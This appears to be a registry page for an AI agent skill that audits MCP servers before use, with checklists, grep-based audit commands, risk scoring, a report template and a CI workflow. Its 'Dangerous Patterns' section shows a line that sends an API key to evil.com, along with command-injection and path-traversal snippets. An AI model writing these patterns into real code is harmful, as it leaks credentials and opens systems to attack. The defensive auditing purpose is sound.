Skill Mcp Security Audit
by @aptratcn
Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.
clawhub install mcp-security-auditπ About This Skill
name: skill-mcp-security-audit description: Security audit for MCP (Model Context Protocol) servers. Detect data exfiltration risks, command injection, permission escalation, and supply chain vulnerabilities before adding MCP servers to your agent. Trigger on: 'audit MCP', 'MCP security', 'check MCP server', 'scan MCP'. metadata: openclaw: requires: {}
MCP Security Audit π
> Don't blindly trust MCP servers. Audit them first.
The Problem
MCP (Model Context Protocol) servers give AI agents powerful capabilities - file access, API calls, code execution. But they can also:
Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.
Quick Audit Checklist
1. Source Verification β
β‘ Is this an official/verified package?
β‘ Check npm/PyPI download counts and maintainer history
β‘ Review recent commits for suspicious changes
β‘ Verify package signature if available
2. Network Audit π
β‘ List all external URLs/domains the MCP connects to
β‘ Check for hardcoded API endpoints
β‘ Verify TLS certificate validation is enabled
β‘ Flag any data sent to unknown domains
3. File Access Audit π
β‘ What directories can the MCP read/write?
β‘ Is access scoped to project directory only?
β‘ Check for path traversal vulnerabilities
β‘ Flag any access to ~/.ssh, ~/.config, env files
4. Command Execution Audit β‘
β‘ Does the MCP execute shell commands?
β‘ Are commands user-controlled or hardcoded?
β‘ Check for command injection vectors
β‘ Verify sandboxing/isolation if present
5. Permission Scope Audit π
β‘ What permissions does the MCP request?
β‘ Are permissions minimal (principle of least privilege)?
β‘ Check for excessive scope requests
β‘ Verify user consent for sensitive operations
6. Dependency Audit π¦
β‘ Run npm audit / pip-audit / cargo audit
β‘ Check for known CVEs in dependencies
β‘ Flag outdated packages with security fixes
β‘ Review transitive dependencies
Audit Commands
For npm-based MCP servers:
# Check package.json for suspicious scripts
cat package.json | jq '.scripts'Audit dependencies
npm auditCheck for post-install scripts
cat package.json | jq '.scripts.postinstall, .scripts.preinstall'List network calls (requires grep)
grep -r "fetch\|axios\|http\|https\|ws://" src/ --include="*.js" --include="*.ts"
For Python MCP servers:
# Check requirements.txt for suspicious packages
cat requirements.txtAudit dependencies
pip-auditCheck for network calls
grep -r "requests\|urllib\|httpx\|aiohttp" src/ --include="*.py"Check for subprocess calls
grep -r "subprocess\|os.system\|exec\|eval" src/ --include="*.py"
Risk Scoring
| Category | Weight | High Risk Indicators | |----------|--------|---------------------| | Network | 30% | Unknown domains, no TLS, data exfil patterns | | File Access | 25% | Home dir access, path traversal, sensitive files | | Command Exec | 25% | Unsanitized input, shell=True, arbitrary commands | | Dependencies | 15% | Known CVEs, unmaintained packages | | Source | 5% | Unverified maintainer, recent ownership change |
Score β₯ 70: High risk - Do not use without review Score 40-69: Medium risk - Use with caution Score < 40: Low risk - Generally safe
Red Flags π©
Immediately reject MCP servers with:
1. Obfuscated code - eval(atob('...')) or similar
2. Dynamic code loading - Loading code from remote URLs
3. Environment variable exfil - Sending process.env or os.environ externally
4. Credential harvesting - Asking for passwords/tokens unnecessarily
5. No source code - Binary-only distributions without reproducible builds
Audit Report Template
# MCP Security Audit ReportServer: [name]
Version: [version]
Audited: [date]
Risk Score: [score]/100
Findings
Critical
[list critical issues] High
[list high issues] Medium
[list medium issues] Low
[list low issues] Recommendations
1. [recommendation]
2. [recommendation]
Verdict
[ ] APPROVED - Safe to use
[ ] APPROVED WITH CAUTION - Review recommendations
[ ] REJECTED - Too many risks
Common MCP Security Patterns
Safe Patterns β
// Scoped file access
const allowedDir = path.resolve(process.cwd(), 'data');
if (!filePath.startsWith(allowedDir)) throw new Error('Access denied');// Sanitized commands
const allowedCommands = ['git', 'npm', 'node'];
if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');
// Explicit user consent
if (!await askUserConsent('Allow access to X?')) return;
Dangerous Patterns β
// DON'T: Unrestricted file read
fs.readFileSync(userInput); // Path traversal!// DON'T: Shell injection
exec(git ${userBranch}); // Command injection!
// DON'T: Credential exposure
fetch('https://evil.com/steal?token=' + process.env.API_KEY);
Integration with CI/CD
Add to your workflow:
# .github/workflows/mcp-audit.yml
name: MCP Security Audit
on: [push, pull_request]jobs:
audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Audit MCP servers
run: |
# Add your audit commands here
npm audit
# Check for suspicious patterns
grep -r "eval\|exec\|process.env" mcp-servers/ && exit 1
Related Skills
References
Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.